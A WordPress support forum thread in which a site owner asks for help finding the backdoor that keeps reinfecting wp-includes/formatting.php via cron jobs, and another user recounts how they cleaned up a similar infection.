Malware keeps changing wp-includes/formatting.php file
-
I am out of ideas on where to find the backdoor that allows the malware to change the wp-includes/formatting.php file on this site. This is the screenshot of the offending line (from a Sucuri scan):
https://imgur.com/a/RfmL6iRThis seems to be creating new customer accounts on the website. When I found out about it, it had already created more than one thousand new customer accounts. I already reset all administrator passwords, reset my FTP password, reset my hosting account password, reset my cPanel password, put new salt and security keys on the wp-config file, looked in the usual places, made sure no PHP files are in the uploads folder, uploaded fresh copies of the plugins and themes (all of them are reputable plugins), uploaded fresh WordPress files. I even tried reinstalling the entire WordPress website, but I was faced with the same problem.
Can anyone help me figure it out?The page I need help with: [log in to see the link]
-
I did try with WordFence and then with Sucuri. They detect the file as being modified, but even if I restore it to the original formatting.php, it still comes out as being infected a few seconds after.
I have already traced the persistence to being a couple of cron jobs that I cannot seem to delete from my cPanel. I am in contact with my hosting account right now to ask for help, and I am on hold because they cannot seem to figure out how to delete the cron jobs as well.
Here’s are my current cron jobs, I want help with deleting the last two because those look suspicious to me.I’ve been infected with this same thing. Im not sure if you ever got help but bits and pieces of posts from different sites helped me get it under control. My site was being redirected and also contained blog posts that went to poker sites with iframes.
- had my host run a scan on my server & removed the files it found. Look for anything similar in your site in the smae areas that just dont look like core files. (alternatively you could go to step 2 if you can)
/public_html/a4496f.php
/public_html/wp-admin/link-parse-opml-core.php
/public_html/hazmod.php
/public_html/wp-includes/class.wp-dependencies-private.php - once I deleted those files I was able to install wordfence and run a scan. it found more infected files. I updated the wordpress files except the wp-conent folder. Updated the plugins, removed unused themes, removed any weird wordpress users and deleted all the blog posts it created. I even changed all account passwords (web host/cpanel/email account/wordpress admins/ftp accounts)
- I still had the issue of one file reverting back with a string of code my wp-includes/plugin.php as soon as I removed the bit of code it was back after reopening the file. Your post led me to check my cron jobs and from there I saw the malicious code like yours. I was able to erase it and since then my plugin.php file has not updated with the string of code and my scans are clean so fingers crossed. It might be possible you have to delete some infected files before you can remove the cron job trying to run.
I truly hope if anyone find themselves here that this helps because I couldnt even find anything mentioning this exact backdoor but this post and if you need help my username is the same on social media platforms so you can reach out.
- had my host run a scan on my server & removed the files it found. Look for anything similar in your site in the smae areas that just dont look like core files. (alternatively you could go to step 2 if you can)
- The topic ‘Malware keeps changing wp-includes/formatting.php file’ is closed to new replies.